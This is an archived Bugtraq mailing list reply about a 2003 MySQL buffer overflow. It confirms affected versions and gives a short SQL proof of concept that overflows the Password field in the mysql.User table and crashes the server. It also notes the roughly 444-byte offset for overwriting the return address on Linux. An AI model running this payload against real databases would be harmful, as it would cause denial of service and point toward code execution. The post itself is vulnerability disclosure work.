Bugtraq mailing list archives

Re: Buffer overflow in MySQL

From: Konstantin Tsolov <ktsolov () etel bg>
Date: Thu, 11 Sep 2003 13:41:29 +0300


managed to replicate on 4.0.13 (custom made) running on slack8.1 with
mysql.mysql.

3.23.51 (the distro mysql version) also proved vulnerable.

nb: just make sure you have a backup copy of your mysql db when testing this
harmless proof of concept on your production server :-)

successful exploitation of that bug is trivial on some platforms. On most
Linux systems the return address needs about 444 bytes to get overwritten.

  Harmless proof of concept :
  > USE mysql;
  > ALTER TABLE User CHANGE COLUMN Password Password LONGTEXT;
  > UPDATE User SET Password =

'123456781234567812345678123456781234567812345678123456781234567812345678
 123456781234567812345678123456781234567812345678123456781234567812345678
 123456781234567812345678123456781234567812345678123456781234567812345678
 12345678123456781234567812345678...' WHERE User = 'abcd';

  > FLUSH PRIVILEGES;

  [Connection lost]


-- 

"Talk is cheap because supply always exceeds demand."
                -- source unknown

+------------------------------------------------------+
| Konstantin Tsolov             ktsolov at etel dot bg |
| Systems Administrator - VoIP                         |
| eTel Ltd.                                www.etel.bg |
| Sofia, Bulgaria                                      |
+------------------------------------------------------+

Current thread:

Buffer overflow in MySQL Jedi/Sector One (Sep 10)
- Re: Buffer overflow in MySQL Konstantin Tsolov (Sep 12)